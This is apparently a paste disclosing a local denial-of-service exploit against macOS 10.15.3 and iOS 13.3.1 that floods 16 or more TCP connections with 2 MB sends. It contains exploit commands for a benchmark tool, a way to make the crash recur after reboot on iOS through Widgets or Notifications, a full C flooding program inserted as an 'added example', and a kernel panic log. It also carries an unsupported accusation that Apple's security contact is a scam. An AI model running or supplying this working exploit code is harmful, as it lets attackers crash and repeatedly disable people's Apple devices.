gvalkov
Mar 19th, 2020

Crash macOS 10.15.3 and iOS 13.3.1 by sending large data packets >= 2MB over 16 or more TCP connections
https://www.youtube.com/watch?v=yEUncSvY04Y
https://www.youtube.com/watch?v=3p_hakQXYxo
https://www.youtube.com/watch?v=E1Plab0CgJM
https://www.youtube.com/watch?v=mJryK4kA0qM

Exploit description
Resource limits and their handling within the TCP stack on iOS and macOS allow an attacker to exhaust a pool of system resources, so that system components stop responding while they wait to obtain a resource. User space is then unable to service the watchdog, which expires a minute later and generates a kernel panic. The panic log below shows exactly that: watchdogd panics the machine with "userspace watchdog timeout" after 60 seconds without updates from its monitoring thread, with logd and WindowServer among the monitored services.

Attack vector
To trigger the vulnerability, establish 16 or more TCP connections; 32 to 128 connections work reliably and trigger it every time. Start a dedicated thread for each connection and have it send data in chunks of 2 MB or more per connection (the "large packets" of the title). iOS reboots instantly. On macOS, once the exploit has fired the exploit application can no longer be stopped or killed; applications such as Activity Monitor stop responding, and within a minute there is a kernel panic (userspace watchdog timeout) and the machine powers off. The exploit can be triggered by any local user. On iOS, persistence can be obtained by registering the exploit to run as a Widget or to handle Notifications, so it fires again after the reboot.

Vulnerability type: Denial of Service (local), may persist after reboot
Component: kernel resource pool, TCP stack
Vendor: Apple Inc.
Product: macOS, iOS
Version: macOS Catalina 10.15.3, iOS 13.3.1
Impact: Denial of Service (local)

product-security@apple.com is a scam! Apple do not want to acknowledge and pay bounties to people who discover exploits.
I disclosed this exploit privately to them on the 18th of February 2020. A couple of weeks later they stopped replying to my e-mails.

Proof of concept (PoC): download my network benchmark tool and use it to trigger the vulnerability:
http://httpstorm.com/tools/gns/

Steps to reproduce:
The device that sends the large data is the one that crashes; it can be either the server or the client.

Exploit commands 1: the same device acts as both server and client, and it crashes. No remote server or client is required.
The device opens a listening socket on TCP port 81, connects to itself and starts sending data over 32 connections.
server: gns -lp81
client: gns 127.0.0.1 81 -wc32

Exploit commands 2: the client crashes.
The server listens on TCP port 81; the client connects to the server IP on TCP port 81 and sends large data packets over 32 connections.
server: gns -lp81
client: gns SERVER_IP 81 -wc32

Exploit commands 3: the server crashes.
The server listens on TCP port 81; the client establishes 32 connections to the server IP on TCP port 81, and the server sends large data packets over all of them.
server: gns -wlp81
client: gns SERVER_IP 81 -c32

Legend:
l = listen
p = specify port number
81 = use TCP port 81
w = this device sends data over the TCP connections
c = specify number of TCP connections
32 = use 32 TCP connections
SERVER_IP = IP address of the server
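The self-connect variant above (exploit commands 1: listen, connect to 127.0.0.1 over 32 connections, one sending thread per connection, sends of 2 MB or more) written out as an added C example. This is not gvalkov's gns tool and not code from the paste; port 81, the 32 connections and the 2 MB chunk are the paste's figures, while the assumption that the listening side simply drains what it receives is mine. It uses only POSIX sockets and pthreads, so it builds on macOS and Linux with `cc -pthread flood.c -o flood`. Run it only on a machine you are prepared to lose: on a vulnerable build the expected outcome is the watchdog panic shown below, and the paste reports that the process cannot be killed once it has fired.

```c
/* Added example, not gvalkov's gns tool: the paste's "exploit commands 1" in plain C.
 * Assumes the listening side drains what it receives. Run only on a disposable machine. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define CHUNK_BYTES   (2u * 1024u * 1024u)  /* ">= 2 MB" per send, per the paste */
#define DEFAULT_CONNS 32                    /* "16 or more"; 32..128 "work reliably" */
#define DEFAULT_PORT  81                    /* the paste's commands use TCP port 81 */

static struct sockaddr_in loopback_addr(uint16_t port) {
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(port) };
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    return sa;
}

/* Listening socket on 127.0.0.1:port (0 = kernel picks a free port); fd or -1. */
int open_listener(uint16_t port) {
    struct sockaddr_in sa = loopback_addr(port);
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd >= 0 && bind(fd, (struct sockaddr *)&sa, sizeof sa) == 0 && listen(fd, 128) == 0) return fd;
    if (fd >= 0) close(fd);
    return -1;
}

/* Port a bound socket actually got (needed after open_listener(0)); 0 on error. */
uint16_t bound_port(int fd) {
    struct sockaddr_in sa; socklen_t len = sizeof sa;
    return getsockname(fd, (struct sockaddr *)&sa, &len) == 0 ? ntohs(sa.sin_port) : 0;
}

/* Blocking connect to 127.0.0.1:port; fd or -1. */
int connect_loopback(uint16_t port) {
    struct sockaddr_in sa = loopback_addr(port);
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd >= 0 && connect(fd, (struct sockaddr *)&sa, sizeof sa) == 0) return fd;
    if (fd >= 0) close(fd);
    return -1;
}

/* Write the whole buffer, retrying short writes; len, or -1 once the socket fails. */
ssize_t send_all(int fd, const unsigned char *buf, size_t len) {
    for (size_t done = 0; done < len;) {
        ssize_t n = send(fd, buf + done, len - done, 0);
        if (n <= 0) return -1;
        done += (size_t)n;
    }
    return (ssize_t)len;
}

/* Round-trip len bytes over one fresh loopback pair; 1 on success. Both ends run in this
 * thread, so keep len within the socket buffers (a few KB). Plumbing check, not the attack. */
int loopback_selftest(size_t len) {
    int ok = 0, lfd = open_listener(0), cfd = -1, afd = -1;
    unsigned char *out = malloc(len), *in = malloc(len);
    if (lfd >= 0 && out && in && (cfd = connect_loopback(bound_port(lfd))) >= 0 &&
        (afd = accept(lfd, NULL, NULL)) >= 0) {
        memset(out, 0x41, len);
        ok = send_all(cfd, out, len) == (ssize_t)len &&
             recv(afd, in, len, MSG_WAITALL) == (ssize_t)len && memcmp(in, out, len) == 0;
    }
    free(out); free(in);
    if (afd >= 0) close(afd); if (cfd >= 0) close(cfd); if (lfd >= 0) close(lfd);
    return ok;
}

/* Sender thread: one connection, CHUNK_BYTES writes back to back until the socket fails. */
static void *sender(void *arg) {
    unsigned char *chunk = calloc(1, CHUNK_BYTES);
    while (chunk && send_all(*(int *)arg, chunk, CHUNK_BYTES) > 0) {}
    free(chunk);
    return NULL;
}

/* Drain thread: the accepting side reads and discards (assumed gns behaviour). */
static void *drainer(void *arg) {
    unsigned char sink[1 << 16];
    while (recv(*(int *)arg, sink, sizeof sink, 0) > 0) {}
    return NULL;
}

int main(int argc, char **argv) {
    int conns = argc > 1 ? atoi(argv[1]) : DEFAULT_CONNS;
    uint16_t port = (uint16_t)(argc > 2 ? atoi(argv[2]) : DEFAULT_PORT);
    int lfd = open_listener(port), *fds = calloc(2 * (size_t)conns, sizeof *fds);
    if (lfd < 0 || !fds) { perror("listen"); return 1; }
    for (int i = 0; i < conns; i++) {
        pthread_t t;
        fds[2 * i] = connect_loopback(port);          /* client: gns 127.0.0.1 81 -wc32 */
        fds[2 * i + 1] = accept(lfd, NULL, NULL);      /* server: gns -lp81 */
        if (fds[2 * i] < 0 || fds[2 * i + 1] < 0) { perror("connect/accept"); return 1; }
        pthread_create(&t, NULL, sender, &fds[2 * i]);
        pthread_create(&t, NULL, drainer, &fds[2 * i + 1]);
    }
    pause();                                           /* run until killed or the host panics */
    return 0;
}
```

Binding port 81 needs root; pass a high port as the second argument to run unprivileged (`./flood 32 8081`), keeping in mind that the paste only reports results for port 81. The connect/accept pairing is done sequentially in one loop, which works because the listener backlog (128) covers the 32 connections before any accept() runs; each pair then gets one sender and one drainer thread, which is the "dedicated thread per connection" the paste calls for.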

panic(cpu 2 caller 0xffffff7f9bd9dad5): userspace watchdog timeout: remoted connection watchdog expired, no updates from remoted monitoring thread in 60 seconds, 27 checkins from thread since monitoring enabled 580 seconds ago after load
service: com.apple.logd, total successful checkins since load (580 seconds ago): 58, last successful checkin: 10 seconds ago
service: com.apple.WindowServer, total successful checkins since load (550 seconds ago): 54, last successful checkin: 10 seconds ago

Backtrace (CPU 2), Frame : Return Address
0xffffff83c5dd3820 : 0xffffff801b33bb2b
0xffffff83c5dd3870 : 0xffffff801b4734d5
0xffffff83c5dd38b0 : 0xffffff801b464f4e
0xffffff83c5dd3900 : 0xffffff801b2e2a40
0xffffff83c5dd3920 : 0xffffff801b33b217
0xffffff83c5dd3a20 : 0xffffff801b33b5fb
0xffffff83c5dd3a70 : 0xffffff801bad2b25
0xffffff83c5dd3ae0 : 0xffffff7f9bd9dad5
0xffffff83c5dd3af0 : 0xffffff7f9bd9d7e6
0xffffff83c5dd3b10 : 0xffffff801ba6739b
0xffffff83c5dd3b60 : 0xffffff801ba70443
0xffffff83c5dd3ca0 : 0xffffff801b422d12
0xffffff83c5dd3db0 : 0xffffff801b3419d8
0xffffff83c5dd3e10 : 0xffffff801b318635
0xffffff83c5dd3e70 : 0xffffff801b32f0e5
0xffffff83c5dd3f00 : 0xffffff801b44b575
0xffffff83c5dd3fa0 : 0xffffff801b2e3226
Kernel Extensions in backtrace:
com.apple.driver.watchdog(1.0)[053A5D15-51D4-3E61-978B-EB435FA4BD0A]@0xffffff7f9bd9c000->0xffffff7f9bda4fff

BSD process name corresponding to current thread: watchdogd
Boot args: chunklist-security-epoch=0 -chunklist-no-rev2-dev

Mac OS version:
19D76

Kernel version:
Darwin Kernel Version 19.3.0: Thu Jan 9 20:58:23 PST 2020; root:xnu-6153.81.5~1/RELEASE_X86_64
Kernel UUID: A8DDE75C-CD97-3C37-B35D-1070CC50D2CE
Kernel slide: 0x000000001b000000
Kernel text base: 0xffffff801b200000
__HIB text base: 0xffffff801b100000
System model name: MacBookPro15,1 (Mac-937A206F2EE63C01)
System shutdown begun: NO

System uptime in nanoseconds: 589081430568
last loaded kext at 18150396650: @kext.AMDFramebuffer 3.0.5 (addr 0xffffff7fa09c8000, size 249856)
loaded kexts:
@kext.AMDFramebuffer 3.0.5
@kext.AMDRadeonX4000 3.0.5
@kext.AMDRadeonServiceManager 3.0.5
>!AGraphicsDevicePolicy 4.7.2
@fileutil 20.036.15
@AGDCPluginDisplayMetrics 4.7.2
>!AHV 1
|IOUserEthernet 1.0.1
|IO!BSerialManager 7.0.3f5
>pmtelemetry 1
>!AUpstreamUserClient 3.6.8
>!APlatformEnabler 2.7.0d0
>AGPM 111.4.2
>X86PlatformShim 1.0.0
@Dont_Steal_Mac_OS_X 7.0.0
>!A!IKBLGraphics 14.0.4
>AGDCBacklightControl 4.7.2
>ACPI_SMC_PlatformPlugin 1.0.0
>!AThunderboltIP 3.1.3
@kext.AMD9500!C 3.0.5
>BridgeAudioCommunication 6.66
>!ABacklight 180.1
>!ATopCaseHIDEventDriver 3430.1
>!AGFXHDA 100.1.424
>!A!ISlowAdaptiveClocking 4.0.0
>!A!IPCHPMC 2.0.1
>!AMuxControl2 4.7.2
>!AHIDALSService 1
>!ABridgeAudio!C 6.66
>!A!ICFLGraphicsFramebuffer 14.0.4
>!AAVEBridge 6.1
>!AFIVRDriver 4.1.0
>!AMCCSControl 1.13
@filesystems.autofs 3.0
@filesystems.ntfs 3.14.3
>BCMWLANFirmware4355.Hashstore 1
>BCMWLANFirmware4364.Hashstore 1
>BCMWLANFirmware4377.Hashstore 1
>!AFileSystemDriver 3.0.1
@filesystems.hfs.kext 522.0.9
@BootCache 40
@!AFSCompression.!AFSCompressionTypeDataless 1.0.0d1
@!AFSCompression.!AFSCompressionTypeZlib 1.0.0
>!AVirtIO 1.0
>!ABCMWLANBusInterfacePCIe 1
@filesystems.apfs 1412.81.1
@private.KextAudit 1.0
>!ASmartBatteryManager 161.0.0
>!AACPIButtons 6.1
>!ASMBIOS 2.1
>!AACPIEC 6.1
>!AAPIC 1.7
$!AImage4 1
@nke.applicationfirewall 303
$TMSafetyNet 8
@!ASystemPolicy 2.0.0
|EndpointSecurity 1
@kext.AMDRadeonX4100HWLibs 1.0
@kext.AMDRadeonX4000HWServices 3.0.5
|IOAVB!F 800.17
>!ASSE 1.0
@!AGPUWrangler 4.7.2
>IOPlatformPluginLegacy 1.0.0
>!AHDA!C 283.15
|IOHDA!F 283.15
>!ABacklightExpert 1.1.0
>!AHS!BDriver 3430.1
>IO!BHIDDriver 7.0.3f5
|IONDRVSupport 569.4
>!AActuatorDriver 3430.1
>!AMultitouchDriver 3430.1
>!AInputDeviceSupport 3430.1
|IOSlowAdaptiveClocking!F 1.0.0
>X86PlatformPlugin 1.0.0
>IOPlatformPlugin!F 6.0.0d8
>!AGraphicsControl 4.7.2
>!AThunderboltEDMSink 4.2.2
>!AThunderboltDPOutAdapter 6.2.5
>!AHIDKeyboard 209
|IO!BHost!CUARTTransport 7.0.3f5
|IO!BHost!CTransport 7.0.3f5
>!A!ILpssUARTv1 3.0.60
>!A!ILpssUARTCommon 3.0.60
>!AOnboardSerial 1.0
>!ASMBusPCI 1.0.14d1
@kext.AMDSupport 3.0.5
@!AGraphicsDeviceControl 4.7.2
|IOAccelerator!F2 438.3.1
>!ASMBus!C 1.0.18d1
|IOGraphics!F 569.4
@plugin.IOgPTPPlugin 810.1
|IOEthernetAVB!C 1.1.0
@kext.triggers 1.0
>usb.IOUSBHostHIDDevice 1.2
>usb.cdc.ecm 5.0.0
>usb.cdc.ncm 5.0.0
>usb.cdc 5.0.0
>usb.networking 5.0.0
>usb.!UHostCompositeDevice 1.2
|IOSurface 269.6
@filesystems.hfs.encodings.kext 1
|IOAudio!F 300.2
@vecLib.kext 1.2.0
>!ABCMWLANCore 1.0.0
>mDNSOffloadUserClient 1.0.1b8
>IOImageLoader 1.0.0
|IOSerial!F 11
|IO80211!FV2 1200.12.2b1
>corecapture 1.0.4
|IOSkywalk!F 1
>!AThunderboltPCIDownAdapter 2.5.4
>!AThunderboltDPInAdapter 6.2.5
>!AThunderboltDPAdapter!F 6.2.5
>!AHPM 3.4.4
>!A!ILpssI2C!C 3.0.60
>!A!ILpssDmac 3.0.60
>!A!ILpssI2C 3.0.60
>!AXsanScheme 3
>usb.!UVHCIBCE 1.2
>usb.!UVHCI 1.2
>usb.!UVHCICommonBCE 1.0
>usb.!UVHCICommon 1.0
>!AThunderboltNHI 5.8.6
|IOThunderbolt!F 7.6.0
>!AEffaceableNOR 1.0
|IOBufferCopy!C 1.1.0
|IOBufferCopyEngine!F 1
>usb.!UHostPacketFilter 1.0
|IOUSB!F 900.4.2
|IONVMe!F 2.1.0
>usb.!UXHCIPCI 1.2
>usb.!UXHCI 1.2
>!AEFINVRAM 2.1
>!AEFIRuntime 2.1
>!ASMCRTC 1.0
|IOSMBus!F 1.1
|IOHID!F 2.0.0
$quarantine 4
$sandbox 300.0
@kext.!AMatch 1.0.0d1
>!AKeyStore 2
>!UTDM 489.80.2
|IOSCSIBlockCommandsDevice 422.0.2
>!ACredentialManager 1.0
>KernelRelayHost 1
>!ASEPManager 1.0.1
>IOSlaveProcessor 1
>!AFDEKeyStore 28.30
>!AEffaceable!S 1.0
>!AMobileFileIntegrity 1.0.5
@kext.CoreTrust 1
|CoreAnalytics!F 1
|IOTimeSync!F 810.1
|IONetworking!F 3.4
>DiskImages 493.0.0
|IO!B!F 7.0.3f5
|IO!BPacketLogger 7.0.3f5
|IOUSBMass!SDriver 157.40.7
|IOSCSIArchitectureModel!F 422.0.2
|IO!S!F 2.1
|IOUSBHost!F 1.2
>usb.!UCommon 1.0
>!UHostMergeProperties 1.2
>!ABusPower!C 1.0
|IOReport!F 47
>!AACPIPlatform 6.1
>!ASMC 3.1.9
>watchdog 1
|IOPCI!F 2.9
|IOACPI!F 1.4
@kec.pthread 1
@kec.corecrypto 1.0
@kec.Libm 1